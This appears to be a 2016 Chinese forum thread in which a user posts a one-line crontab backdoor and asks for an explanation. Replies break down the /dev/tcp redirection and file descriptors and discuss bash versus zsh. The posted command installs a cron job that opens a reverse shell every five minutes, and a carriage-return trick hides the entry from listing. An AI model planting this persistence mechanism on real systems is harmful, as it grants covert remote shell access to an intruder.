麻烦懂的详细解释下这段 shell 脚本

This topic created in 3457 days ago, the information mentioned may be changed or developed.

直接贴代码了，如下：

(crontab -l;printf "*/5 * * * * exec9<> /dev/tcp/localhost/8080&&exec0<&9&&exec1>&92>&1&&/bin/bash --noprofile – I;\rno crontab for whoami%100c\n")|crontab -

嗯，这是一段 crontab 后门的代码

crontab

代码

printf

exec9

12 replies • 2016-11-26 13:06:30 +08:00

lrvy

Nov 25, 2016

监听本地 8080 端口 nc -l -p 8080

redsonic

Nov 25, 2016

传说中的用 bash 进行网络通讯

Tink

PRO

Nov 25, 2016

http://explainshell.com/explain?cmd=%28crontab+-l%3Bprintf+%22*%2F5+*+*+*+*+exec9%3C%3E+%2Fdev%2Ftcp%2Flocalhost%2F8080%26%26exec0%3C%269%26%26exec1%3E%2692%3E%261%26%26%2Fbin%2Fbash+--noprofile+%E2%80%93+I%3B%5Crno+crontab+for+whoami%25100c%5Cn%22%29%7Ccrontab+-

Tink

PRO

Nov 25, 2016

http://explainshell.com/

skydiver

Nov 25, 2016

感觉是复制粘贴错了吧，根本运行不了

Owenjia

Nov 25, 2016

这是从哪复制来的？好像不太对吧？貌似有些是转义过的，后面那个 –（ U+2013 ）……
格式化下应该就好看懂了，主要是重定向和文件描述符。

exec 9<> /dev/tcp/localhost/8080
exec 0 <& 9
exec 1 >& 9 2>& 1

skydiver

Nov 25, 2016

@Owenjia 运行不了，后来发现是因为我用的 zsh ， bash 里这样才行

rrfeng

Nov 25, 2016

约等于于在 8080 开了个 bash ……

Owenjia

Nov 25, 2016

@skydiver
恩， zsh 没有 /dev/{tcp,udp}/host/port ，不过可以用 zshtcpsys 。

skydiver

Nov 26, 2016 via Android

@rrfeng 这个并没有监听端口吧

rrfeng

Nov 26, 2016 via Android

@skydiver
/dev/tcp/localhost/8080
这就是端口

skydiver

Nov 26, 2016

@rrfeng 我试了，这个并不会监听端口，只会连接到端口， bash 告诉我 Connection refused

就算是监听也不应该监听 localhost 啊，那样外面又连不上……